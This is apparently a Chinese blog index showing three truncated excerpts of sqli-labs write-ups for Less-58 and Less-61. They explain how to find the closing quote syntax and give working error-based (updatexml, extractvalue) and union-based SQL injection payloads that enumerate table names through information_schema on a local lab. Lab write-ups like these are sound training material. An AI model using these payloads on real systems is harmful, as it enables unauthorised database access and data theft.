摘要：61通过单引号强制报错，查看报错信息，确定闭合符号为((' ')) 表名 127.0.0.1/sqli-labs-master/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from inf 阅读全文

摘要：Less58 测试union查询无显示，测试报错注入均成功 方式1： ?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 方式2： ?id=1' union select extractvalue(1,concat(0x7e, 阅读全文

摘要：思路：从给的库名推出表名，在推出列名，之后查看每列数据进行测试，找到key 表名 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='CHALLENG 阅读全文